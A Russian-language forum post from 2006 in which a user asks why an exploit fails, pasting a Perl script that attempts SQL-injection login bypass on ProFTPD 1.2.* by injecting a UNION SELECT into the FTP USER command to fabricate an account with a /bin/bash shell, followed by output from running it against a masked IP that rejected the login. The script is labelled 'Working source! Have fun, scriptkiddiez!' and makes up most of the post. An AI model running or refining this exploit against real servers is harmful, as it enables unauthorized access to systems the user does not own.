| ProblemaT2 |
03.04.2006 12:22 |
Что я делаю не так?
Неавторизованный доступ ProFTPD 1.2.*
Вот сплойт:
Код HTML:
#!/usr/bin/perl
# Origin: runlevel [ runlevel@raregazz.org ] Spain, 2003
# Updated by Sawasoft and Dr. Trunk Latvia, 2003
# Working source! Have fun, scriptkiddiez!
use IO::Socket;
if(@ARGV<2)
{
# print "\nProof Of Concept Sql Inject on ProFTPD\n";
# print "Usage: perl poc-sqlftp <target> [1=Alternate query]\n\n";
print "DZJAAAAAAAA \n\n\n";
# exit(0);
};
$server = $ARGV[0];
$query = $ARGV[1];
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$server,PeerPort=>"21",Reuse=>1)
or die "Can't connect. \n";
if(defined($line=<$remote>))
{
print STDOUT $line;
if($query eq "1")
{
print $remote "USER ')UNION SELECT'u','p',1001,1001,'/tmp','/bin/bash'WHERE(''='\n";
}
else
{
print $remote "USER ')UNION SELECT'u','p',1001,1001,'/bin/bash' WHERE(''='\n";
};
if(defined($line=<$remote>))
{
print STDOUT $line;
print $remote "PASS p\n";
if(defined($line=<$remote>))
{
print STDOUT $line;
print "Sent query to $ARGV[0]\n";
if($line =~ /230/)
{
print "[------- Sql Inject Able \n";
}
else
{
print "[------- Sql Inject Unable \n";
};
};
};
};
close $remote;
C:\Perl\bin>perl C:\Perl\ftp.pl ***.**.**.**
DZJAAAAAAAA
220 ProFTPD 1.2.10 Server (ProFTPD) [***.**.**.**]
331 Password required for ')UNION.
530 Login incorrect.
Sent query to ***.**.**.**
[------- Sql Inject Unable
Вот что получаеться |
